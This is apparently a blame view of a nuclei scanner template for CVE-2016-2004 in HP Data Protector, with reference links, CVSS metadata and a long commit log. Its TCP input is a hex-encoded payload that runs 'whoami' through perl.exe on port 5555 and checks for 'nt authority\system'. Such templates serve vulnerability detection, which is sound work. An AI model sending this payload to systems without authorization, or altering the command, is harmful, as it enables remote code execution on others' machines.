nuclei-templates/network/cves/2016/CVE-2016-2004.yaml

43 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2016-2004
info:
Dashboard Content Enhancements (#4358) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference Co-authored-by: sullo <sullo@cirt.net>
2022-05-11 07:58:51 +00:00
name: HP Data Protector - Arbitrary Command Execution
author: pussycat0x
severity: critical
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
2023-09-06 13:28:19 +00:00
remediation: |
Upgrade to the most recent version of HP Data Protector.
reference:
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
- http://www.kb.cert.org/vuls/id/267328
- https://www.exploit-db.com/exploits/39858/
2023-07-16 13:29:08 +00:00
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-2004
cwe-id: CWE-306
epss-score: 0.12552
epss-percentile: 0.95291
2023-07-16 13:29:08 +00:00
cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-16 13:29:08 +00:00
vendor: hp
product: data_protector
tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
tcp:
2023-07-16 13:29:08 +00:00
- host:
- "{{Hostname}}"
- "{{Host}}:5555"
2023-07-16 13:29:08 +00:00
inputs:
- data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
type: hex
matchers:
- type: word
encoding: hex
words:
- "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402207046969da28fc75542becf1938f21d6cc0fad5e8bd2bfdd7993f31513f3458a5022017a5f1db732389f1dd68eb303a432c087e77f142c1eb5fe007d98f9f0b42eca4:922c64590222798bb761d5b6d8e72950